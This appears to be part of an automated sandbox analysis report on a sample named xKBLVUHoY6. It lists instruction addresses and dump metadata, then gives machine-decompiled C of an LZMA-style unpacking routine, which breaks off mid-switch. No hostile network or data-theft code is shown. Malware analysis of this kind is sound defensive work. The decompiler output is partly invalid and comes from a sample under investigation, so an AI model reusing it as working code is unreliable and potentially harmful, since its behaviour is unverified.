                                                0x00406f0b
                                                0x00406f2e
                                                0x00406f31
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f0d
                                                0x00406f10
                                                0x00406f13
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x00406f26
                                                0x00000000
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x00000000
                                                0x00406fd6
                                                0x00406fc1
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x00000000
                                                0x00000000
                                                0x00407234
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040723a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x0040733c
                                                0x004072f7
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e2
                                                0x004073e5
                                                0x004072e6
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072ec
                                                0x00000000
                                                0x0040701c
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x0040733c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407061
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fa
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x00407366
                                                0x0040732f

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                                • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00407234() {
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int* _t605;
                                                				void* _t612;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t612 - 0x40) != 0) {
                                                						 *(_t612 - 0x84) = 0x13;
                                                						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                						goto L132;
                                                					} else {
                                                						__eax =  *(__ebp - 0x4c);
                                                						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                						__ecx =  *(__ebp - 0x58);
                                                						__eax =  *(__ebp - 0x4c) << 4;
                                                						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                						L130:
                                                						 *(__ebp - 0x58) = __eax;
                                                						 *(__ebp - 0x40) = 3;
                                                						L144:
                                                						 *(__ebp - 0x7c) = 0x14;
                                                						L145:
                                                						__eax =  *(__ebp - 0x40);
                                                						 *(__ebp - 0x50) = 1;
                                                						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                						L149:
                                                						if( *(__ebp - 0x48) <= 0) {
                                                							__ecx =  *(__ebp - 0x40);
                                                							__ebx =  *(__ebp - 0x50);
                                                							0 = 1;
                                                							__eax = 1 << __cl;
                                                							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                							__eax =  *(__ebp - 0x7c);
                                                							 *(__ebp - 0x44) = __ebx;
                                                							while(1) {
                                                								L140:
                                                								 *(_t612 - 0x88) = _t533;
                                                								while(1) {
                                                									L1:
                                                									_t534 =  *(_t612 - 0x88);
                                                									if(_t534 > 0x1c) {
                                                										break;
                                                									}
                                                									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                                                										case 0:
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											_t534 =  *( *(_t612 - 0x70));
                                                											if(_t534 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											_t538 = _t534 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t569);
                                                											_push(9);
                                                											_pop(_t570);
                                                											_t608 = _t538 / _t569;
                                                											_t540 = _t538 % _t569 & 0x000000ff;
                                                											asm("cdq");
                                                											_t603 = _t540 % _t570 & 0x000000ff;
                                                											 *(_t612 - 0x3c) = _t603;
                                                											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                												L10:
                                                												if(_t611 == 0) {
                                                													L12:
                                                													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t611 = _t611 - 1;
                                                													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                												} while (_t611 != 0);
                                                												goto L12;
                                                											}
                                                											if( *(_t612 - 4) != 0) {
                                                												GlobalFree( *(_t612 - 4)); // executed
                                                											}
                                                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t612 - 4) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t612 - 0x6c);
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											_t45 = _t612 - 0x48;
                                                											 *_t45 =  *(_t612 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t612 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											_t546 =  *(_t612 - 0x40);
                                                											if(_t546 ==  *(_t612 - 0x74)) {
                                                												L20:
                                                												 *(_t612 - 0x48) = 5;
                                                												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											 *(_t612 - 0x74) = _t546;
                                                											if( *(_t612 - 8) != 0) {
                                                												GlobalFree( *(_t612 - 8)); // executed
                                                											}
                                                											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                											 *(_t612 - 8) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                											 *(_t612 - 0x84) = 6;
                                                											 *(_t612 - 0x4c) = _t553;
                                                											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                											goto L132;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t612 - 0x6c);
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											_t67 = _t612 - 0x70;
                                                											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                											if( *(_t612 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t531 =  *_t605;
                                                											_t588 = _t531 & 0x0000ffff;
                                                											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                											if( *(_t612 - 0xc) >= _t564) {
                                                												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                												 *(_t612 - 0x40) = 1;
                                                												_t532 = _t531 - (_t531 >> 5);
                                                												__eflags = _t532;
                                                												 *_t605 = _t532;
                                                											} else {
                                                												 *(_t612 - 0x10) = _t564;
                                                												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                											}
                                                											if( *(_t612 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											} else {
                                                												goto L137;
                                                											}
                                                										case 5:
                                                											L137:
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 5;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                											L139:
                                                											_t533 =  *(_t612 - 0x84);
                                                											goto L140;
                                                										case 6:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											goto L132;
                                                										case 8:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xa;
                                                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                											} else {
                                                												__eax =  *(__ebp - 0x38);
                                                												__ecx =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 0x38) + 0xf;
                                                												 *(__ebp - 0x84) = 9;
                                                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                											}
                                                											goto L132;
                                                										case 9:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L90;
                                                											}
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t259;
                                                											0 | _t259 = _t259 + _t259 + 9;
                                                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                											goto L76;
                                                										case 0xa:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L89;
                                                										case 0xb:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L89:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L90:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
